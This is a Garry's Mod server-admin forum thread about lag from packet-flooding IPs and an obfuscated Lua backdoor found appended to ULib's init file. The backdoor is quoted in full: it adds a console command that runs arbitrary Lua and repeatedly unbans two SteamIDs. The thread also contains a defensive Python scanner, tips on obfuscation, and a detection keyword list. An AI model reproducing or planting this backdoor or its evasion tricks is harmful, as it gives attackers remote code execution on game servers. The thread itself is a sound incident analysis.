Low Bandwidth Attack

My main server has been having a very bad connection with 900+ ping. If I start the server on another IP address or port number, it runs fine. When looking at Netlimiter, the server has an unusual number of outgoing and incoming connections compared to my other servers, despite being empty. None of my other servers have this issue. It seems like this may be some kind of malformed packet attack, but I really have no idea. I was wondering if anybody had any suggestions.

Wireshark save:
http://216.245.193.98/xmisc/attackissue.pcap
Note: The server having the issue is 216.245.193.98:27015

Here is a Wireshark txt output:
http://216.245.193.98/xmisc/oddissue2

In particular there are a lot of packets coming from 96.43.138.109, but I really do not know if that is the cause. They are going to 216.245.193.98:27015 however, which is the address of my server.

It’s definitely some sort of issue with the port, like an attack. If I host my server on another IP it works fine. If I host another server at this IP, it has the same issue.

Block 96.43.138.109

Not sure if this is a coincidence or not, but here’s what happened. I used IPSec to block the IP address, 96.43.138.109, and the lag stopped instantly. Afterwards, I have an odd issue where the server crashes and restarts at exact intervals of about 30 seconds. The server console is also getting spammed with “removeid” commands of two SteamIDs that are known exploiters that have somehow uploaded Lua files to the server before.

After a while, the crashing stopped and the server ran stable for a while. Soon the huge lag begins again. I do a Wireshark capture and an abnormal amount of packets is coming from 96.43.138.124 (notice how close it is to the other IP). I block that IP and the lag instantly stopped. The removeids are still being spammed. I have already confirmed that rcon is secure, and I’m working on doing batch searches for any uploaded lua that is spamming the unban.

[editline]19th May 2011[/editline]

I found this in addons/ulib/init.lua at the very bottom:
[lua]
-- Backdoor appended to addons/ulib/init.lua. Every identifier and SteamID is split
-- into pieces so a plain text search for RunString / concommand / the IDs finds nothing.
local r = _G["R".."u".."n".."Str".."ing"]          -- RunString
local c = _G["co".."nco".."mman".."d"]             -- concommand
local a = "A".."dd"                                -- "Add"
local s = "i".."i"                                 -- console command name "ii"
c[a](s, function(m, n, o) r(o[1]) end)             -- concommand.Add("ii", ...): runs whatever Lua is passed as the first argument
local s1 = "STE".."AM_0:".."1:1767".."2340"        -- STEAM_0:1:17672340
local s2 = "STEA".."M_0:".."1:548".."998".."8"     -- STEAM_0:1:5489988
local ub = "un".."b".."an"                         -- "unban"
-- every 5 seconds, unban both SteamIDs through ULib (the "removeid" spam seen in the console)
timer.Create("Spy sappin mah code", 5, 0, function()
    if (ULib && ULib[ub]) then ULib[ub](s1) ULib[ub](s2) end  -- bracket calls assumed; the forum markup dropped them
end)
[/lua]

I don’t know how they’re uploading. I’m really lucky my batch search just happened to be the first 4 digits of their Steamid, seeing as to how they’ve obfuscated it.

lol, obfuscation, that guy needs to work on it, it’s pretty obvious when you look at it

It’s not obfuscation, it’s probably so you can’t just use find in files on RunString/concommand/SteamIDs.

Considering there is an exploit out there where you can upload lua, I’d say that this is a real issue. I’ve had to delete random RunString functions and stuff several times now.

Other ways of obfuscation I’ve seen include string.char, and of course using the _G table is useful.
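The "batch search" the OP describes only works if the search undoes the tricks above first. The following scanner is an added example, not code from the thread: it folds `"a".."b"` chains, decodes `string.char(...)` sequences and unwraps `_G["Name"]`, then looks for RunString, concommand, SteamIDs and friends. The sample input is constructed from the backdoor quoted above (the `ULib[ub]` calls and the `string.char` line are assumed), and `SUSPICIOUS` is my own list, not a ULib or Garry's Mod API.

```python
import os
import re

# Constructed sample: the backdoor quoted in this thread (straight quotes restored,
# ULib[ub] calls assumed) plus one string.char line added to show that variant.
SAMPLE = r'''
local r = _G["R".."u".."n".."Str".."ing"] local c = _G["co".."nco".."mman".."d"]
local a = "A".."dd" local s = "i".."i" c[a](s, function(m, n, o) r(o[1]) end)
local s1 = "STE".."AM_0:".."1:1767".."2340" local s2 = "STEA".."M_0:".."1:548".."998".."8"
local ub = "un".."b".."an"
timer.Create("Spy sappin mah code", 5, 0, function() if (ULib && ULib[ub]) then ULib[ub](s1) ULib[ub](s2) end end)
local h = string.char(104, 116, 116, 112)
'''

_CONCAT = re.compile(r'"([^"\\]*)"\s*\.\.\s*"([^"\\]*)"')                # "a" .. "b"
_CHAR = re.compile(r'string\.char\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)')     # string.char(82, 117)
_GLOOKUP = re.compile(r'_G\s*\[\s*"([^"]+)"\s*\]')                       # _G["RunString"]
STEAMID = re.compile(r'STEAM_\d:\d:\d+')
SUSPICIOUS = ("RunString", "CompileString", "concommand", "http.Fetch", "file.Write", "unban")

def normalize(src: str) -> str:
    """Undo the cheap obfuscation seen in the thread: fold "a".."b" chains, decode
    string.char(n, ...) and turn _G["Name"] into Name. Double-quoted, escape-free literals only."""
    prev = None
    while prev != src:                       # repeat until no chain is left
        prev = src
        src = _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
    src = _CHAR.sub(lambda m: '"%s"' % "".join(chr(int(n)) for n in m.group(1).split(",")), src)
    return _GLOOKUP.sub(lambda m: m.group(1), src)

def scan(src: str) -> dict:
    """Report dangerous API names and SteamIDs that appear once src is normalized."""
    text = normalize(src)
    return {
        "calls": sorted(k for k in SUSPICIOUS if k in text),
        "steamids": sorted(set(STEAMID.findall(text))),
    }

def scan_tree(root: str) -> dict:
    """Batch-search every .lua file under root; returns {path: findings} for hits only."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".lua"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    found = scan(f.read())
                if found["calls"] or found["steamids"]:
                    hits[path] = found
    return hits
```

Run `scan_tree` over the server's lua/ and addons/ folders; every hit is a file to read by hand, since legitimate addons also use concommand and RunString.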

Do you have sv_allowupload 0?

Yes, I do


sv_allowupload 0
sv_allowdownload 0

Rcon password has been changed several times as well, so that’s not the issue either.

Do you have any binary modules installed that allow file reading/writing? Check the lua/includes/modules/ folder.

No, I actually made sure of this since the beginning. The only .dll module is gm_sqlite.

How big is it (kb)?

They have access to your FTP/Control Panel/RDP account.

gm_sqlite.dll is 464,384 bytes. I’m currently locking down my server by hardcoding bans against the attackers using gmsv_gatekeeper, however that obviously doesn’t mitigate the fact that it is possible to upload lua files to my server.

[editline]19th May 2011[/editline]

My FTP logs show many attempts, but no one has been using it other than me. I have no control panel. My Event Viewer logs show a ton of attempted logins, but the only logins are by me, and since I have school during a certain time period I’m sure it’s me. So I am positive the remote desktop is not compromised. Besides, in the unlikely event remote desktop was compromised, I’m sure they would do more damage than toy around with one out of many gameservers and websites.

So I don’t see why you’re so sure the server is compromised at that level, I’m not a complete newbie at managing a dedicated server.

If they had RDP access, they could just go into the console and unban instead of putting it into a Lua script…
If they had FTP they could just remove their ID from the ban file…

:rolleyes:

They might be lazy. There’s no way without a binary module that they could edit ulib’s init file. The file upload exploit only worked for creating files, not updating them…

It’s the only real logical solution.

I’ve been in an email conversation with the person before and they vaguely mention some “attack vector” but then they stopped responding to my emails after I offered money in return for it…

I see where you’re coming from but unfortunately I don’t see any evidence of those vectors being vulnerable.

Out of curiosity, who was it? Would you mind telling me the email/steamid/ip?

I would assume STEAM_0:1:5489988 and STEAM_0:1:17672340.

If they got access to your FTP, you can only assume they are smart enough to purge the logs of their entry…